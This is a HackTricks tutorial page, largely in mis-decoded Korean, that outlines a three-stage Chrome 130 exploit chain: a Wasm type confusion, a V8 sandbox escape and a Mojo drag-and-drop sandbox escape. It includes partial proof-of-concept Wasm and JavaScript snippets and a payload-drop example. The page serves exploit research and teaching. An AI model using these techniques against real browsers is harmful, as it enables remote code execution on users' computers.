Chrome Exploiting

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

์ด ํŽ˜์ด์ง€๋Š” ์—ฐ๊ตฌ ์‹œ๋ฆฌ์ฆˆ โ€œ101 Chrome Exploitationโ€(Part-0 โ€” Preface)์„ ๊ธฐ๋ฐ˜์œผ๋กœ Google Chrome 130์— ๋Œ€ํ•œ ํ˜„๋Œ€์ ์ธ โ€œfull-chainโ€ exploitation ์›Œํฌํ”Œ๋กœ์šฐ์— ๋Œ€ํ•œ ๋†’์€ ์ˆ˜์ค€์ด๋ฉด์„œ๋„ ์‹ค์šฉ์ ์ธ ๊ฐœ์š”๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ๋ชฉํ‘œ๋Š” pentesters์™€ exploit-developers๊ฐ€ ์ž์‹ ์˜ ์—ฐ๊ตฌ๋ฅผ ์œ„ํ•ด ๊ธฐ์ˆ ๋“ค์„ ์žฌํ˜„ํ•˜๊ฑฐ๋‚˜ ์ ์‘์‹œํ‚ค๋Š” ๋ฐ ํ•„์š”ํ•œ ์ตœ์†Œํ•œ์˜ ๋ฐฐ๊ฒฝ์ง€์‹์„ ์ œ๊ณตํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

1. Chrome Architecture Recap

๊ณต๊ฒฉ ํ‘œ๋ฉด์„ ์ดํ•ดํ•˜๋ ค๋ฉด ์ฝ”๋“œ๊ฐ€ ์–ด๋””์—์„œ ์‹คํ–‰๋˜๋Š”์ง€์™€ ์–ด๋–ค sandboxes๊ฐ€ ์ ์šฉ๋˜๋Š”์ง€๋ฅผ ์•Œ์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค.

Chrome process & sandbox layout ```text +-------------------------------------------------------------------------+ | Chrome Browser | | | | +----------------------------+ +-----------------------------+ | | | Renderer Process | | Browser/main Process | | | | [No direct OS access] | | [OS access] | | | | +----------------------+ | | | | | | | V8 Sandbox | | | | | | | | [JavaScript / Wasm] | | | | | | | +----------------------+ | | | | | +----------------------------+ +-----------------------------+ | | | IPC/Mojo | | | V | | | +----------------------------+ | | | | GPU Process | | | | | [Restricted OS access] | | | | +----------------------------+ | | +-------------------------------------------------------------------------+ ```

๋‹ค์ธต ์‹ฌ์ธต ๋ฐฉ์–ด(defence-in-depth):

  • V8 sandbox (Isolate): ๋ฉ”๋ชจ๋ฆฌ ๊ถŒํ•œ์ด ์ œํ•œ๋˜์–ด JITed JS / Wasm๋กœ๋ถ€ํ„ฐ ์ž„์˜์˜ ์ฝ๊ธฐ/์“ฐ๊ธฐ๋ฅผ ๋ฐฉ์ง€ํ•ฉ๋‹ˆ๋‹ค.
  • Renderer โ†” Browser split์€ Mojo/IPC ๋ฉ”์‹œ์ง€ ์ „๋‹ฌ์„ ํ†ตํ•ด ๋ณด์žฅ๋ฉ๋‹ˆ๋‹ค; ๋ Œ๋”๋Ÿฌ๋Š” ๋„ค์ดํ‹ฐ๋ธŒ FS/๋„คํŠธ์›Œํฌ ์ ‘๊ทผ ๊ถŒํ•œ์ด ์—†์Œ.
  • OS sandboxes๋Š” ๊ฐ ํ”„๋กœ์„ธ์Šค๋ฅผ ์ถ”๊ฐ€๋กœ ๊ฒฉ๋ฆฌํ•ฉ๋‹ˆ๋‹ค (Windows Integrity Levels / seccomp-bpf / macOS sandbox profiles).

๋”ฐ๋ผ์„œ ์›๊ฒฉ ๊ณต๊ฒฉ์ž๋Š” ์—ฐ์†๋œ ์„ธ ๊ฐ€์ง€ ํ”„๋ฆฌ๋ฏธํ‹ฐ๋ธŒ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

  1. V8 ๋‚ด๋ถ€์˜ ๋ฉ”๋ชจ๋ฆฌ ์†์ƒ์œผ๋กœ V8 ํž™ ๋‚ด๋ถ€์—์„œ์˜ ์ž„์˜ RW๋ฅผ ์–ป์Œ.
  2. ๊ณต๊ฒฉ์ž๊ฐ€ V8 sandbox๋ฅผ ๋ฒ—์–ด๋‚˜ ์ „์ฒด ๋ Œ๋”๋Ÿฌ ๋ฉ”๋ชจ๋ฆฌ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋Š” ๋‘ ๋ฒˆ์งธ ๋ฒ„๊ทธ.
  3. ์ตœ์ข… sandbox ํƒˆ์ถœ(์ข…์ข… ๋ฉ”๋ชจ๋ฆฌ ์†์ƒ์ด ์•„๋‹Œ ๋…ผ๋ฆฌ์  ์ทจ์•ฝ์ )์œผ๋กœ Chrome OS sandbox ์™ธ๋ถ€์—์„œ ์ฝ”๋“œ ์‹คํ–‰.

2. ๋‹จ๊ณ„ 1 โ€“ WebAssembly Type-Confusion (CVE-2025-0291)

TurboFan์˜ Turboshaft ์ตœ์ ํ™”์˜ ๊ฒฐํ•จ์œผ๋กœ, ๊ฐ’์ด ๋‹จ์ผ ๊ธฐ๋ณธ ๋ธ”๋ก ๋ฃจํ”„ ๋‚ด์—์„œ ์ƒ์„ฑ๋˜๊ณ  ์†Œ๋น„๋  ๋•Œ WasmGC reference types์„ ์ž˜๋ชป ๋ถ„๋ฅ˜ํ•ฉ๋‹ˆ๋‹ค.

์˜ํ–ฅ:

  • ์ปดํŒŒ์ผ๋Ÿฌ๊ฐ€ ํƒ€์ž… ์ฒดํฌ๋ฅผ ๊ฑด๋„ˆ๋›ฐ์–ด, reference (externref/anyref)๋ฅผ int64๋กœ ์ทจ๊ธ‰ํ•ฉ๋‹ˆ๋‹ค.
  • ์กฐ์ž‘๋œ Wasm์€ JS ๊ฐ์ฒด ํ—ค๋”๋ฅผ ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ์–ดํ•˜๋Š” ๋ฐ์ดํ„ฐ์™€ ๊ฒน์น˜๊ฒŒ ํ•˜์—ฌ โ†’ addrOf() & fakeObj() AAW / AAR primitives ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

์ตœ์†Œ PoC (๋ฐœ์ทŒ):

(module
(type $t0 (func (param externref) (result externref)))
(func $f (param $p externref) (result externref)
(local $l externref)
block $exit
loop $loop
local.get $p      ;; value with real ref-type
;; compiler incorrectly re-uses it as int64 in the same block
br_if $exit       ;; exit condition keeps us single-block
br   $loop
end
end)
(export "f" (func $f)))

JS์—์„œ ์ตœ์ ํ™” ํŠธ๋ฆฌ๊ฑฐ ๋ฐ spray objects:

const wasmMod = new WebAssembly.Module(bytes);
const wasmInst = new WebAssembly.Instance(wasmMod);
const f = wasmInst.exports.f;

for (let i = 0; i < 1e5; ++i) f({});   // warm-up for JIT

// primitives
let victim   = {m: 13.37};
let fake     = arbitrary_data_backed_typedarray;
let addrVict = addrOf(victim);

Outcome: arbitrary read/write within V8.

3. Stage 2 โ€“ V8 Sandbox ํƒˆ์ถœ (issue 379140430)

Wasm ํ•จ์ˆ˜๊ฐ€ tier-up-compiled๋˜๋ฉด, JS โ†” Wasm wrapper๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. A signature-mismatch bug๋กœ ์ธํ•ด, Wasm ํ•จ์ˆ˜๊ฐ€ ์Šคํƒ์— ๋‚จ์•„ ์žˆ๋Š” ์ƒํƒœ์—์„œ ์žฌ-์ตœ์ ํ™”๋  ๋•Œ wrapper๊ฐ€ ์‹ ๋ขฐ๋œ Tuple2 ๊ฐ์ฒด์˜ ๋์„ ๋„˜์–ด ์“ฐ๊ธฐ๋ฅผ ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

Tuple2 ๊ฐ์ฒด์˜ 2 ร— 64-bit ํ•„๋“œ๋ฅผ ๋ฎ์–ด์“ฐ๋ฉด Renderer process ๋‚ด์˜ ์ž„์˜ ์ฃผ์†Œ์— ๋Œ€ํ•œ read/write๊ฐ€ ๊ฐ€๋Šฅํ•ด์ ธ V8 sandbox๋ฅผ ์‚ฌ์‹ค์ƒ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค.

์ต์Šคํ”Œ๋กœ์ž‡์˜ ์ฃผ์š” ๋‹จ๊ณ„:

  1. turbofan/baseline ์ฝ”๋“œ๋ฅผ ๋ฒˆ๊ฐˆ์•„ ์‚ฌ์šฉํ•ด ํ•จ์ˆ˜๊ฐ€ Tier-Up ์ƒํƒœ๊ฐ€ ๋˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.
  2. ์Šคํƒ์— ๋ ˆํผ๋Ÿฐ์Šค๋ฅผ ์œ ์ง€ํ•œ ์ฑ„๋กœ (Function.prototype.apply) tier-up์„ ํŠธ๋ฆฌ๊ฑฐํ•ฉ๋‹ˆ๋‹ค.
  3. Stage-1 AAR/AAW๋ฅผ ์‚ฌ์šฉํ•ด ์ธ์ ‘ํ•œ Tuple2๋ฅผ ์ฐพ์•„ ์†์ƒ์‹œํ‚ต๋‹ˆ๋‹ค.

Wrapper identification:

function wrapperGen(arg) {
return f(arg);
}
%WasmTierUpFunction(f);          // force tier-up (internals-only flag)
wrapperGen(0x1337n);

์†์ƒ ์ดํ›„ ์šฐ๋ฆฌ๋Š” ์™„์ „ํ•œ ๊ธฐ๋Šฅ์„ ๊ฐ–์ถ˜ renderer R/W primitive๋ฅผ ๋ณด์œ ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

4. 3๋‹จ๊ณ„ โ€“ Renderer โ†’ OS Sandbox Escape (CVE-2024-11114)

The Mojo IPC interface blink.mojom.DragService.startDragging()๋Š” Renderer์—์„œ partially trusted ๋งค๊ฐœ๋ณ€์ˆ˜๋กœ ํ˜ธ์ถœ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. DragData ๊ตฌ์กฐ์ฒด๋ฅผ ์ž„์˜์˜ ํŒŒ์ผ ๊ฒฝ๋กœ๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋„๋ก ์กฐ์ž‘ํ•จ์œผ๋กœ์จ Renderer๋Š” ๋ธŒ๋ผ์šฐ์ €๊ฐ€ native ๋“œ๋ž˜๊ทธ ์•ค ๋“œ๋กญ์„ outside the renderer sandbox์—์„œ ์ˆ˜ํ–‰ํ•˜๋„๋ก ์„ค๋“ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด๋ฅผ ์•…์šฉํ•˜๋ฉด ์šฐ๋ฆฌ๋Š” ํ”„๋กœ๊ทธ๋ž˜๋ฐ์ ์œผ๋กœ โ€œdragโ€๋œ ์•…์„ฑ EXE(์‚ฌ์ „์— world-writable ์œ„์น˜์— ๋†“์•„๋‘”)๋ฅผ Desktop์œผ๋กœ ์˜ฎ๊ธธ ์ˆ˜ ์žˆ๊ณ , Windows๋Š” ํŒŒ์ผ์ด ๋–จ์–ด์ง€๋ฉด ํŠน์ • ํŒŒ์ผ ํ˜•์‹์„ ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค.

Example (simplified):

const payloadPath = "C:\\Users\\Public\\explorer.exe";

chrome.webview.postMessage({
type: "DragStart",
data: {
title: "MyFile",
file_path: payloadPath,
mime_type: "application/x-msdownload"
}
});

์ถ”๊ฐ€์ ์ธ ๋ฉ”๋ชจ๋ฆฌ ์†์ƒ์€ ํ•„์š”ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค โ€“ ๋…ผ๋ฆฌ์  ๊ฒฐํ•จ์œผ๋กœ ์‚ฌ์šฉ์ž์˜ ๊ถŒํ•œ์œผ๋กœ ์ž„์˜์˜ ํŒŒ์ผ ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

5. ์ „์ฒด ์ฒด์ธ ํ๋ฆ„

  1. ์‚ฌ์šฉ์ž ๋ฐฉ๋ฌธ ์•…์„ฑ ์›นํŽ˜์ด์ง€.
  2. 1๋‹จ๊ณ„: Wasm module๊ฐ€ CVE-2025-0291์„ ์•…์šฉ โ†’ V8 heap AAR/AAW.
  3. 2๋‹จ๊ณ„: Wrapper mismatch๊ฐ€ Tuple2๋ฅผ ์†์ƒ์‹œ์ผœ โ†’ V8 sandbox ํƒˆ์ถœ.
  4. 3๋‹จ๊ณ„: startDragging() IPC โ†’ OS sandbox ํƒˆ์ถœ & ํŽ˜์ด๋กœ๋“œ ์‹คํ–‰.

๊ฒฐ๊ณผ: Remote Code Execution (RCE) ํ˜ธ์ŠคํŠธ์—์„œ (Chrome 130, Windows/Linux/macOS).

6. ์‹ค์Šต ๋ฐ ๋””๋ฒ„๊น… ์„ค์ •

# Spin-up local HTTP server w/ PoCs
npm i -g http-server
git clone https://github.com/Petitoto/chromium-exploit-dev
cd chromium-exploit-dev
http-server -p 8000 -c -1

# Windows kernel debugging
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbgx.exe" -symbolpath srv*C:\symbols*https://msdl.microsoft.com/download/symbols

Chrome์˜ development build์„ ์‹คํ–‰ํ•  ๋•Œ ์œ ์šฉํ•œ flags:

chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"

7. Renderer โ†’ kernel ํƒˆ์ถœ ์ž์›

๋ Œ๋”๋Ÿฌ ์ต์Šคํ”Œ๋กœ์ž‡์ด seccomp profile ๋‚ด๋ถ€์— ๋จธ๋ฌด๋Š” kernel pivot์„ ํ•„์š”๋กœ ํ•  ๋•Œ, sandbox ๋‚ด๋ถ€์—์„œ ์—ฌ์ „ํžˆ ์ ‘๊ทผ ๊ฐ€๋Šฅํ•œ AF_UNIX MSG_OOB sockets๋ฅผ ๋‚จ์šฉํ•˜๋ฉด ๊ฒฐ์ •๋ก ์ ์ธ ๊ฒฝ๋กœ๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. SKB UAF โ†’ kernel RCE chain์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ ์•„๋ž˜์˜ Linux kernel exploitation case-study๋ฅผ ํ™•์ธํ•˜์„ธ์š”:

Af Unix Msg Oob Uaf Skb Primitives

์š”์ 

  • WebAssembly JIT bugs๋Š” ์—ฌ์ „ํžˆ ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ์ง„์ž…์ ์ž…๋‹ˆ๋‹ค โ€“ ํƒ€์ž… ์‹œ์Šคํ…œ์ด ์•„์ง ์„ฑ์ˆ™ํ•˜์ง€ ์•Š์•˜์Šต๋‹ˆ๋‹ค.
  • V8 ๋‚ด๋ถ€์—์„œ ๋‘ ๋ฒˆ์งธ memory-corruption ๋ฒ„๊ทธ(์˜ˆ: wrapper mismatch)๋ฅผ ์–ป์œผ๋ฉด V8-sandbox escape๊ฐ€ ํ›จ์”ฌ ๋‹จ์ˆœํ•ด์ง‘๋‹ˆ๋‹ค.
  • ๊ถŒํ•œ์ด ๋ถ€์—ฌ๋œ Mojo IPC ์ธํ„ฐํŽ˜์ด์Šค์˜ ๋กœ์ง ์ˆ˜์ค€ ์•ฝ์ ์€ ์ข…์ข… final sandbox escape์— ์ถฉ๋ถ„ํ•ฉ๋‹ˆ๋‹ค โ€“ non-memory ๋ฒ„๊ทธ์— ์ฃผ๋ชฉํ•˜์„ธ์š”.

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ